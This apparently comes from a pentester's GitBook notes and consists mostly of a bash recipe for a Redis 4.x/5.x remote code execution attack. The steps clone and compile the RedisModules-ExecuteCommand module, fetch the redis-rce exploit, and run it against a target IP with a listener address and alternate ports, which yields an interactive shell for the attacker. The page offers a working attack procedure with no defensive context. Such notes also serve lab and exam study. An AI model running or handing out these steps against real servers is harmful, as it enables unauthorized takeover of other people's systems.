# Load Redis module

{% code overflow="wrap" %}

```bash
# Ridter/redis-rce: Redis 4.x/5.x RCE (github.com)
# This attack will provide an interactive shell open to the attacker

# copy an attack module
git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand

# Compile 
cd RedisModules-ExecuteCommand/
make

# Copy an exploit
cd ../
git clone https://github.com/Ridter/redis-rce

cd redis-rce
python ./redis-rce.py -r 192.168.90.69 -L 192.168.49.90 -f ../RedisModules-ExecuteCommand/module.so

# If not work, you may change the port number 
python ./redis-rce.py -r 192.168.90.69 -L 192.168.49.90 -p 4444 -f ../RedisModules-ExecuteCommand/module.so

python ./redis-rce.py -r 192.168.90.69 -L 192.168.49.90 -p 50 -f ../RedisModules-ExecuteCommand/module.so
```

{% endcode %}

<figure><img src="https://4082237222-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FnA4bAkddGXesk1QCLYAY%2Fuploads%2FpMf0OFhpN7cOeJHi76yw%2Fimage.png?alt=media&#x26;token=2b503158-2061-4318-9422-e1d04703643b" alt="" width="375"><figcaption></figcaption></figure>
